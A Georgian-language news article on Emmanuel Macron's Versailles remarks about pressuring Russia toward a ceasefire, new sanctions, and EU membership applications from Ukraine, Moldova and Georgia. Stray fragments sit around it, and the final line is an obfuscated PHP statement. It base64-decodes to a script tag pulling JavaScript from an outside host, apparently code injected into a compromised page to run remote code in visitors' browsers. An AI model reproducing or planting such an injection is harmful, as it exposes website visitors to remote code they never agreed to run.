celsiusi
ავერსი საქკაბელი
საფრანგეთის პრეზიდენტმა, ემანუელ მაკრონმა ვერსალში შარლ მიშელთან და ურსულა ფონ დერ ლაიენთან გამართულ ერთობლივ პრესკონფერენციაზე განაცხადა, რომ მათი მიზანია მიზანია, წნეხით აიძულონ რუსეთი, ცეცხლის შეწყვეტის გადაწყვეტილება მიიღოს.
 
მისივე თქმით, უკრაინას სხვადასხვა მიმართულებით ეხმარებიან, მათ შორის რუსეთის წინააღმდეგ სანქციების მორიგი პაკეტის დაწესებას გეგმავენ.
 
„ევროპელების პოზიცია ნათელია, ნებისმიერ საერთაშორისო დონეზე ჩვენ ვგმობთ რუსეთის აგრესიას და უკრაინას სხვადასხვა მიმართულებით ვეხმარებით. ესაა როგორც ჰუმანიტარული დახმარება, ასევე დახმარება იარაღით და ეკონომიკური დახმარება. ჩვენ დავაწესეთ უპრეცედენტო სანქციები და კიდევ ვგეგმავთ სანქციების მორიგ პაკეტს, რაც რუსეთს ძალიან რთულ რეალობას შეუქმნის. ჩვენი მიზანია, წნეხით ვაიძულოთ რუსეთი, ცეცხლის შეწყვეტის გადაწყვეტილება მიიღოს. ჩვენ იმდენხანს გავაგრძელებთ ამ წნეხს, ვიდრე ომი არ შეწყდება“, – განაცხადა ემანუელ მაკრონმა.
 
მან პრესკონფერენციაზე ევროკავშირის წევრობისთვის საქართველოს, უკრაინისა და მოლდოვას განაცხადებთან დაკავშირებითაც ისაუბრა.
 
„უკრაინელი ხალხისთვის ჩვენი გზავნილია, რომ ევროპის კარი მათთვის ღიაა, რადგან ჩვენ გვაქვს საერთო დემოკრატიული ღირებულებები. ჩვენ ასევე განვიხილავთ მოლდოვისა და საქართველოს განაცხადებს ევროკავშირის წევრობაზე, რასაც ევროპული კომისია აფასებს. ვერსალის დეკლარაცია, რაზეც დღეს ვიმსჯელეთ, არის ევროპის სუვერენიტეტის დეკლარაცია. ევროკავშირის მომავალი და ჩვენი უსაფრთხოება სწორედ ამაზეა დამოკიდებული“, – განაცხადა ემანუელ მაკრონმა.
 
 
814
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");